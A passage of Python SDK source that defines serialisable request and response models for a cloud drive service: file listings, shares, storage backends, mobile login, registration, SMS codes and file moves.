            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.share_id is not None:
            result['share_id'] = self.share_id
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('async_task_id') is not None:
            self.async_task_id = m.get('async_task_id')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        return self
class HostingSearchFileResponse(TeaModel):
    """
    Search file response: one page of matching hosting files plus a
    pagination marker.
    """
    def __init__(
        self,
        items: List[BaseHostingFileResponse] = None,
        next_marker: str = None,
    ):
        # matching files on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseHostingFileResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class HostingUpdateFileMetaResponse(TeaModel):
    """
    Update file meta response: the full metadata of a hosting-mode file.
    """
    # (attribute name, wire key) pairs, in serialization order; attribute
    # and wire key differ only for crc_64hash -> 'crc64_hash'.
    _FIELDS = (
        ('content_hash', 'content_hash'),
        ('content_hash_name', 'content_hash_name'),
        ('content_type', 'content_type'),
        ('crc_64hash', 'crc64_hash'),
        ('created_at', 'created_at'),
        ('description', 'description'),
        ('domain_id', 'domain_id'),
        ('download_url', 'download_url'),
        ('drive_id', 'drive_id'),
        ('file_extension', 'file_extension'),
        ('file_path', 'file_path'),
        ('name', 'name'),
        ('parent_file_path', 'parent_file_path'),
        ('share_id', 'share_id'),
        ('size', 'size'),
        ('status', 'status'),
        ('thumbnail', 'thumbnail'),
        ('trashed_at', 'trashed_at'),
        ('type', 'type'),
        ('updated_at', 'updated_at'),
        ('upload_id', 'upload_id'),
        ('url', 'url'),
    )
    def __init__(
        self,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        file_extension: str = None,
        file_path: str = None,
        name: str = None,
        parent_file_path: str = None,
        share_id: str = None,
        size: int = None,
        status: str = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
    ):
        self.content_hash = content_hash
        self.content_hash_name = content_hash_name
        self.content_type = content_type
        # serialized under the wire key 'crc64_hash'
        self.crc_64hash = crc_64hash
        self.created_at = created_at
        self.description = description
        self.domain_id = domain_id
        self.download_url = download_url
        self.drive_id = drive_id
        self.file_extension = file_extension
        self.file_path = file_path
        self.name = name
        # path of the parent (original comment wrongly said parent_file_id)
        self.parent_file_path = parent_file_path
        self.share_id = share_id
        self.size = size
        self.status = status
        self.thumbnail = thumbnail
        self.trashed_at = trashed_at
        self.type = type
        self.updated_at = updated_at
        self.upload_id = upload_id
        self.url = url
    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        # name is mandatory and pattern-constrained
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_path is not None:
            self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
            self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
        if self.size is not None:
            # size must lie in [0, 50 GiB]
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
    def to_map(self):
        # emit set fields in declaration order, under their wire keys
        result = dict()
        for attr, key in self._FIELDS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class HostingVideoDRMLicenseResponse(TeaModel):
    """
    DRM license response.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('data', 'device_info', 'states')
    def __init__(
        self,
        data: str = None,
        device_info: str = None,
        states: int = None,
    ):
        # DRM license data
        self.data = data
        # device_info
        self.device_info = device_info
        # states
        self.states = states
    def validate(self):
        # all three fields are mandatory
        self.validate_required(self.data, 'data')
        self.validate_required(self.device_info, 'device_info')
        self.validate_required(self.states, 'states')
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class HostingVideoDefinitionResponse(TeaModel):
    """
    Video definition (transcode) response.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('definition_list', 'frame_rate')
    def __init__(
        self,
        definition_list: List[str] = None,
        frame_rate: str = None,
    ):
        # available definitions
        self.definition_list = definition_list
        # frame_rate
        self.frame_rate = frame_rate
    def validate(self):
        # no constraints on either field
        pass
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class HostingVideoTranscodeResponse(TeaModel):
    """
    Video transcode response.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('definition_list', 'duration', 'hls_time')
    def __init__(
        self,
        definition_list: List[str] = None,
        duration: int = None,
        hls_time: int = None,
    ):
        # available definitions
        self.definition_list = definition_list
        # duration
        self.duration = duration
        # hls_time
        self.hls_time = hls_time
    def validate(self):
        # no constraints on any field
        pass
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListAppsRequest(TeaModel):
    """
    Request for listing apps.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('limit', 'marker')
    def __init__(
        self,
        limit: int = None,
        marker: str = None,
    ):
        # page size of the returned result (1-100)
        self.limit = limit
        # cursor for the next query
        self.marker = marker
    def validate(self):
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListByAnonymousResponse(TeaModel):
    """
    list_file_by_anonymous response: one page of files plus a pagination
    marker.
    """
    def __init__(
        self,
        items: List[BaseFileAnonymousResponse] = None,
        next_marker: str = None,
    ):
        # files on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseFileAnonymousResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListDomainsRequest(TeaModel):
    """
    List domain request.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('limit', 'marker')
    def __init__(
        self,
        limit: int = None,
        marker: str = None,
    ):
        # page size (1-100)
        self.limit = limit
        # query cursor
        self.marker = marker
    def validate(self):
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListDriveResponse(TeaModel):
    """
    List drive response: one page of drives plus a pagination marker.
    """
    def __init__(
        self,
        items: List[BaseDriveResponse] = None,
        next_marker: str = None,
    ):
        # drives on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseDriveResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListFileDeltaResponse(TeaModel):
    """
    List file delta response: a cursor-based page of file change records.
    """
    def __init__(
        self,
        cursor: str = None,
        has_more: bool = None,
        items: List[FileDeltaResponse] = None,
    ):
        # cursor for the next delta query
        self.cursor = cursor
        # whether more deltas are available
        self.has_more = has_more
        # delta records on this page
        self.items = items
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        if self.cursor is not None:
            result['cursor'] = self.cursor
        if self.has_more is not None:
            result['has_more'] = self.has_more
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('cursor') is not None:
            self.cursor = m.get('cursor')
        if m.get('has_more') is not None:
            self.has_more = m.get('has_more')
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [FileDeltaResponse().from_map(item) for item in m.get('items')]
        return self
class ListFileResponse(TeaModel):
    """
    List file response: one page of files plus a pagination marker.
    """
    def __init__(
        self,
        items: List[BaseCCPFileResponse] = None,
        next_marker: str = None,
    ):
        # files on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseCCPFileResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListShareLinkResponse(TeaModel):
    """
    list_share_link response: one page of share links plus a pagination
    marker.
    """
    def __init__(
        self,
        items: List[BaseShareLinkResponse] = None,
        next_marker: str = None,
    ):
        # share links on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseShareLinkResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListShareResponse(TeaModel):
    """
    List share response: one page of shares plus a pagination marker.
    """
    def __init__(
        self,
        items: List[BaseShareResponse] = None,
        next_marker: str = None,
    ):
        # shares on this page
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseShareResponse().from_map(item) for item in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class StoreFile(TeaModel):
    """
    A file entry inside a store.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('domain_id', 'name', 'parent_file_path', 'store_id', 'type')
    def __init__(
        self,
        domain_id: str = None,
        name: str = None,
        parent_file_path: str = None,
        store_id: str = None,
        type: str = None,
    ):
        # domain_id
        self.domain_id = domain_id
        # name
        self.name = name
        # parent_file_path
        self.parent_file_path = parent_file_path
        # store_id
        self.store_id = store_id
        # type
        self.type = type
    def validate(self):
        # no constraints on any field
        pass
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListStoreFileResponse(TeaModel):
    """
    List storage file response: one page of store files plus a pagination
    marker.
    """
    def __init__(
        self,
        items: List[StoreFile] = None,
        next_marker: str = None,
    ):
        # items: file list for this page
        # (bug fix: this comment was previously emitted as the bare
        # statement `file list`, which is a SyntaxError)
        self.items = items
        # marker to pass back for the next page
        self.next_marker = next_marker
    def validate(self):
        # validate each contained item
        if self.items:
            for k in self.items:
                if k:
                    k.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            for k in self.items:
                result['items'].append(k.to_map() if k else None)
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            for k in m.get('items'):
                temp_model = StoreFile()
                self.items.append(temp_model.from_map(k))
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class StoreItemResponse(TeaModel):
    """
    A store (storage backend) description.
    """
    # attribute names double as wire keys; kept in serialization order
    _KEYS = (
        'accelerate_endpoint',
        'base_path',
        'bucket',
        'cdn_endpoint',
        'customized_accelerate_endpoint',
        'customized_cdn_endpoint',
        'customized_endpoint',
        'customized_internal_endpoint',
        'domain_id',
        'endpoint',
        'internal_endpoint',
        'location',
        'ownership',
        'policy',
        'role_arn',
        'store_id',
        'type',
    )
    def __init__(
        self,
        accelerate_endpoint: str = None,
        base_path: str = None,
        bucket: str = None,
        cdn_endpoint: str = None,
        customized_accelerate_endpoint: str = None,
        customized_cdn_endpoint: str = None,
        customized_endpoint: str = None,
        customized_internal_endpoint: str = None,
        domain_id: str = None,
        endpoint: str = None,
        internal_endpoint: str = None,
        location: str = None,
        ownership: str = None,
        policy: str = None,
        role_arn: str = None,
        store_id: str = None,
        type: str = None,
    ):
        # global acceleration endpoint
        self.accelerate_endpoint = accelerate_endpoint
        # common storage path prefix
        self.base_path = base_path
        # bucket name
        self.bucket = bucket
        # CDN endpoint
        self.cdn_endpoint = cdn_endpoint
        # customized global acceleration endpoint
        self.customized_accelerate_endpoint = customized_accelerate_endpoint
        # customized CDN endpoint
        self.customized_cdn_endpoint = customized_cdn_endpoint
        # customized public endpoint
        self.customized_endpoint = customized_endpoint
        # customized VPC endpoint
        self.customized_internal_endpoint = customized_internal_endpoint
        # domain_id
        self.domain_id = domain_id
        # public endpoint
        self.endpoint = endpoint
        # VPC endpoint
        self.internal_endpoint = internal_endpoint
        # location
        self.location = location
        # ownership: 'system' = provided by the platform, 'custom' = user-owned storage
        self.ownership = ownership
        # policy grant; for 'system' stores the bucket is granted to the current cloud account
        self.policy = policy
        # ARN of the role used to access the bucket
        self.role_arn = role_arn
        # store ID
        self.store_id = store_id
        # storage type; currently only 'oss' is supported
        self.type = type
    def validate(self):
        # these fields are mandatory
        for field in ('bucket', 'endpoint', 'ownership', 'policy', 'store_id', 'type'):
            self.validate_required(getattr(self, field), field)
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class ListStoreResponse(TeaModel):
    """
    List storage response: all stores of a domain.
    """
    def __init__(
        self,
        items: List[StoreItemResponse] = None,
    ):
        # store descriptions
        self.items = items
    def validate(self):
        # validate each contained item
        for item in (self.items or []):
            if item:
                item.validate()
    def to_map(self):
        result = dict()
        # 'items' is always emitted, even when empty
        result['items'] = []
        if self.items is not None:
            result['items'] = [item.to_map() if item else None for item in self.items]
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        # always reset the list; rebuild it from the map when present
        self.items = []
        if m.get('items') is not None:
            self.items = [StoreItemResponse().from_map(item) for item in m.get('items')]
        return self
class ListStoresRequest(TeaModel):
    """
    Request for listing the stores of a domain.
    """
    def __init__(
        self,
        domain_id: str = None,
    ):
        # domain ID (required)
        self.domain_id = domain_id
    def validate(self):
        self.validate_required(self.domain_id, 'domain_id')
    def to_map(self):
        mapping = dict()
        if self.domain_id is not None:
            mapping['domain_id'] = self.domain_id
        return mapping
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        return self
class ListUploadedPartResponse(TeaModel):
    """
    List uploaded parts response.
    """
    def __init__(
        self,
        file_id: str = None,
        next_part_number_marker: str = None,
        upload_id: str = None,
        uploaded_parts: List[UploadPartInfo] = None,
    ):
        # file_id
        self.file_id = file_id
        # marker of the next part number, for pagination
        self.next_part_number_marker = next_part_number_marker
        # upload_id
        self.upload_id = upload_id
        # parts uploaded so far
        self.uploaded_parts = uploaded_parts
    def validate(self):
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        # validate each contained part descriptor
        for part in (self.uploaded_parts or []):
            if part:
                part.validate()
    def to_map(self):
        result = dict()
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.next_part_number_marker is not None:
            result['next_part_number_marker'] = self.next_part_number_marker
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        # 'uploaded_parts' is always emitted, even when empty
        result['uploaded_parts'] = []
        if self.uploaded_parts is not None:
            result['uploaded_parts'] = [part.to_map() if part else None for part in self.uploaded_parts]
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('next_part_number_marker') is not None:
            self.next_part_number_marker = m.get('next_part_number_marker')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        # always reset the list; rebuild it from the map when present
        self.uploaded_parts = []
        if m.get('uploaded_parts') is not None:
            self.uploaded_parts = [UploadPartInfo().from_map(part) for part in m.get('uploaded_parts')]
        return self
class LoginByCodeRequest(TeaModel):
    """
    Login-by-code request (Taobao / Alipay third-party login).
    """
    # attribute names double as wire keys for this model
    _KEYS = ('access_token', 'app_id', 'auth_code', 'type')
    def __init__(
        self,
        access_token: str = None,
        app_id: str = None,
        auth_code: str = None,
        type: str = None,
    ):
        # accessToken returned after authentication; required for Taobao login
        self.access_token = access_token
        # App ID of the app being accessed
        self.app_id = app_id
        # AuthCode returned after authentication; required for Alipay login
        self.auth_code = auth_code
        # authentication type (Taobao or Alipay)
        self.type = type
    def validate(self):
        # app_id and type are mandatory
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.type, 'type')
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class LogoutRequest(TeaModel):
    """
    Logout request.

    Note: this model serializes under PascalCase wire keys
    ('BackUrl', 'ClientID', 'LoginType'), unlike most models in this file.
    """
    # (attribute name, wire key) pairs, in serialization order
    _FIELDS = (
        ('back_url', 'BackUrl'),
        ('client_id', 'ClientID'),
        ('login_type', 'LoginType'),
    )
    def __init__(
        self,
        back_url: str = None,
        client_id: str = None,
        login_type: str = None,
    ):
        # redirect URL after logout; defaults to the app's own domain
        self.back_url = back_url
        # Client ID: the AppID returned when the app was created (required)
        self.client_id = client_id
        # login type (per the original comment, a user-defined field echoed
        # back in the callback after successful authentication)
        self.login_type = login_type
    def validate(self):
        self.validate_required(self.client_id, 'client_id')
    def to_map(self):
        result = dict()
        for attr, key in self._FIELDS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class MobileCheckExistRequest(TeaModel):
    """
    Request to check whether a mobile phone number is already registered.
    """
    # attribute names double as wire keys for this model
    _KEYS = ('headers', 'app_id', 'phone_number', 'phone_region')
    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        phone_number: str = None,
        phone_region: str = None,
    ):
        # extra request headers
        self.headers = headers
        # App ID of the app being accessed (required)
        self.app_id = app_id
        # phone number to check (required)
        self.phone_number = phone_number
        # country code; defaults to 86, digits only, no '+' prefix
        self.phone_region = phone_region
    def validate(self):
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.phone_number, 'phone_number')
    def to_map(self):
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._KEYS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class MobileLoginRequest(TeaModel):
    """Request to log in with a mobile number (SMS code or password)."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        auto_register: bool = None,
        captcha_id: str = None,
        captcha_text: str = None,
        encrypted_key: str = None,
        nvc_param: str = None,
        password: str = None,
        phone_number: str = None,
        phone_region: str = None,
        sms_code: str = None,
        sms_code_id: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed.
        self.app_id = app_id
        # Auto-register the user; ignored for password login.
        self.auto_register = auto_register
        # Image captcha ID; required for password login.
        self.captcha_id = captcha_id
        # Captcha text entered by the user; required for password login.
        self.captcha_text = captcha_text
        # AES-256 symmetric key, transmitted encrypted with the App public key.
        self.encrypted_key = encrypted_key
        # Environment parameter.
        self.nvc_param = nvc_param
        # Login password; if given the SMS code is ignored, otherwise SMS login
        # is used.
        self.password = password
        # Phone number to log in with.
        self.phone_number = phone_number
        # Country code; defaults to 86. Digits only, no leading '+'.
        self.phone_region = phone_region
        # SMS verification code; ignored for password login.
        self.sms_code = sms_code
        # SMS verification code ID; ignored for password login.
        self.sms_code_id = sms_code_id

    def validate(self):
        for value, name in (
            (self.app_id, 'app_id'),
            (self.nvc_param, 'nvc_param'),
            (self.phone_number, 'phone_number'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in (
            'headers', 'app_id', 'auto_register', 'captcha_id',
            'captcha_text', 'encrypted_key', 'nvc_param', 'password',
            'phone_number', 'phone_region', 'sms_code', 'sms_code_id',
        ):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in (
            'headers', 'app_id', 'auto_register', 'captcha_id',
            'captcha_text', 'encrypted_key', 'nvc_param', 'password',
            'phone_number', 'phone_region', 'sms_code', 'sms_code_id',
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class MobileRegisterRequest(TeaModel):
    """Request to register a user with a mobile number and SMS code."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        nvc_param: str = None,
        phone_number: str = None,
        phone_region: str = None,
        sms_code: str = None,
        sms_code_id: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed.
        self.app_id = app_id
        # Environment parameter.
        self.nvc_param = nvc_param
        # Phone number to register.
        self.phone_number = phone_number
        # Country code; defaults to 86. Digits only, no leading '+'.
        self.phone_region = phone_region
        # SMS verification code.
        self.sms_code = sms_code
        # SMS verification code ID.
        self.sms_code_id = sms_code_id

    def validate(self):
        for value, name in (
            (self.app_id, 'app_id'),
            (self.nvc_param, 'nvc_param'),
            (self.phone_number, 'phone_number'),
            (self.sms_code, 'sms_code'),
            (self.sms_code_id, 'sms_code_id'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in (
            'headers', 'app_id', 'nvc_param', 'phone_number',
            'phone_region', 'sms_code', 'sms_code_id',
        ):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in (
            'headers', 'app_id', 'nvc_param', 'phone_number',
            'phone_region', 'sms_code', 'sms_code_id',
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class MobileSendSmsCodeRequest(TeaModel):
    """Request to send an SMS verification code to a phone number."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        captcha_id: str = None,
        captcha_text: str = None,
        nvc_param: str = None,
        phone_number: str = None,
        phone_region: str = None,
        type: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed.
        self.app_id = app_id
        # Image captcha ID.
        self.captcha_id = captcha_id
        # Captcha text entered by the user.
        self.captcha_text = captcha_text
        # Environment parameter.
        self.nvc_param = nvc_param
        # Phone number to send the verification SMS to.
        self.phone_number = phone_number
        # Country code; defaults to 86. Digits only, no leading '+'.
        self.phone_region = phone_region
        # Purpose of the code: login, register, change_password.
        self.type = type

    def validate(self):
        for value, name in (
            (self.app_id, 'app_id'),
            (self.nvc_param, 'nvc_param'),
            (self.phone_number, 'phone_number'),
            (self.type, 'type'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in (
            'headers', 'app_id', 'captcha_id', 'captcha_text',
            'nvc_param', 'phone_number', 'phone_region', 'type',
        ):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in (
            'headers', 'app_id', 'captcha_id', 'captcha_text',
            'nvc_param', 'phone_number', 'phone_region', 'type',
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class MoveFileResponse(TeaModel):
    """Response of a file-move operation."""

    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_id: str = None,
    ):
        # ID of the asynchronous move task, if any.
        self.async_task_id = async_task_id
        # Domain ID.
        self.domain_id = domain_id
        # Drive ID.
        self.drive_id = drive_id
        # File ID.
        self.file_id = file_id

    def validate(self):
        # Each ID is only checked when present.
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('async_task_id', 'domain_id', 'drive_id', 'file_id'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('async_task_id', 'domain_id', 'drive_id', 'file_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class PreHashCheckSuccessResponse(TeaModel):
    """Response of a pre-hash check."""

    def __init__(
        self,
        code: str = None,
        file_name: str = None,
        message: str = None,
        parent_file_id: str = None,
        pre_hash: str = None,
    ):
        # Result code.
        self.code = code
        # File name.
        self.file_name = file_name
        # Result message.
        self.message = message
        # Parent file ID.
        self.parent_file_id = parent_file_id
        # Pre-hash value.
        self.pre_hash = pre_hash

    def validate(self):
        self.validate_required(self.parent_file_id, 'parent_file_id')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('code', 'file_name', 'message', 'parent_file_id', 'pre_hash'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('code', 'file_name', 'message', 'parent_file_id', 'pre_hash'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class VerifyTokenResponse(TeaModel):
    """Real-person verification token details."""

    def __init__(
        self,
        token: str = None,
        ttl: int = None,
        url: str = None,
    ):
        # Real-person verification token.
        self.token = token
        # Token lifetime in seconds, e.g. 1800.
        self.ttl = ttl
        # Verification URL, which embeds the token.
        self.url = url

    def validate(self):
        for value, name in (
